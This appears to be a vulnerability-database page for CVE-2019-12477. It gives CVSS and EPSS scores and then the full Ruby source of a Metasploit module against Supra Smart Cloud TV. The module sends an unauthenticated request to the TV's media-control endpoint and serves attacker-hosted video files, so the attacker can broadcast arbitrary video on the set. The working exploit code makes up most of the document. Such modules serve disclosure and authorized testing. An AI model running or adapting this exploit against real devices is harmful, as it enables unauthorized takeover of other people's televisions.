Supra Smart Cloud TV Remote File Inclusion

2024-08-3100:00:00

wvu, Dhiraj Mishra, metasploit.com

packetstormsecurity.com

remote file inclusion

supra smart cloud tv

unauthenticated

crafted request

fake video

CVSS2

2.1

Attack Vector

LOCAL

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:L/AC:L/Au:N/C:N/I:P/A:N

CVSS3

5.5

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

AI Score

7.1

Confidence

Low

EPSS

0.907

Percentile

98.9%

JSON

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::Remote::HttpServer  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Supra Smart Cloud TV Remote File Inclusion',  
'Description' => %q{  
This module exploits an unauthenticated remote file inclusion which  
exists in Supra Smart Cloud TV. The media control for the device doesn't  
have any session management or authentication. Leveraging this, an  
attacker on the local network can send a crafted request to broadcast a  
fake video.  
},  
'Author' => [  
'Dhiraj Mishra', # Discovery, PoC, and module  
'wvu' # Module  
],  
'References' => [  
['CVE', '2019-12477'],  
['URL', 'https://www.inputzero.io/2019/06/hacking-smart-tv.html']  
],  
'DisclosureDate' => '2019-06-03',  
'License' => MSF_LICENSE  
)  
)  
  
deregister_options('URIPATH')  
end  
  
def run  
start_service('Path' => '/')  
  
print_status("Broadcasting Epic Sax Guy to #{peer}")  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => '/remote/media_control',  
'encode_params' => false,  
'vars_get' => {  
'action' => 'setUri',  
'uri' => get_uri + 'epicsax.m3u8'  
}  
)  
  
unless res && res.code == 200 && res.body.include?('OK')  
print_error('No doo-doodoodoodoodoo-doo for you')  
return  
end  
  
# Sleep time calibrated using successful pcap  
print_good('Doo-doodoodoodoodoo-doo')  
print_status('Sleeping for 10s serving .m3u8 and .ts files...')  
sleep(10)  
end  
  
def on_request_uri(cli, request)  
dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-12477')  
  
files = {  
'/epicsax.m3u8' => 'application/x-mpegURL',  
'/epicsax0.ts' => 'video/MP2T',  
'/epicsax1.ts' => 'video/MP2T',  
'/epicsax2.ts' => 'video/MP2T',  
'/epicsax3.ts' => 'video/MP2T',  
'/epicsax4.ts' => 'video/MP2T'  
}  
  
file = request.uri  
  
unless files.include?(file)  
vprint_error("Sending 404 for #{file}")  
return send_not_found(cli)  
end  
  
data = File.read(File.join(dir, file), mode: 'rb')  
  
vprint_good("Sending #{file}")  
send_response(cli, data, 'Content-Type' => files[file])  
end  
end  
`